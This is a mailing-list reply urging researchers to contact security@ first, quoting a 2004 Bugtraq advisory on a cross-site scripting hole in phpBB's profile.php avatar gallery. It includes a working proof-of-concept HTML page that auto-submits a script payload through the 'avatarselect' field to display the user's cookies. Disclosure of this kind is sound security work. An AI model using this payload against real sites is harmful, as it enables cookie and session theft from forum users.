I'm going to say this again. Please contact security@ before posting here, and give them an appropriate amount of time to reply. This goes for _any_ software company. Thank you. ----- Original Message ----- From: "Cheng Peng Su" <apple_soup@msn.com> To: <bugtraq@securityfocus.com> Sent: Saturday, March 20, 2004 10:36 PM Subject: phpBB profile.php Cross Site Scripting Vulnerability | | | | ##################################################################### | | Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability | Release Date : Mar 21,2004 | Application : phpBB | Version : phpBB 2.0.6d or others? | Platform : PHP | Vendor URL : http://www.phpbb.com/ | Author : Cheng Peng Su(apple_soup_at_msn.com) | | ##################################################################### | | Proof of Conecpt: | | This vuln is in profile.php,when you click [Show Gallery],phpBB | will show you Avatar gallery,asking you to choose one for yourself. | The hole is in the form,after submitting phpBB will use the value of | "avatarselect" as the path of the gallery directly,without filtering | any illegal characters. | | Exploit: | | -------------exploit.htm-------------- | <form name='f' action="http://site/profile.php?mode=editprofile"; method="post"> | <input name="avatarselect" value='" ><script>alert(document.cookie)</script>'> | <input type="submit" name="submitavatar" value="Select avatar"> | </form> | <script> | window.onload=function() | { | document.all.submitavatar.click(); | } | </script> | ---------------end------------------- | | Contact: | | Cheng Peng Su | Class 1,Senior 2,High school attached to Wuhan University | Wuhan,Hubei,China(430072) | apple_soup_at_msn.com | -------------------------------------------------------------------- mail2web - Check your email from the web at http://mail2web.com/ .
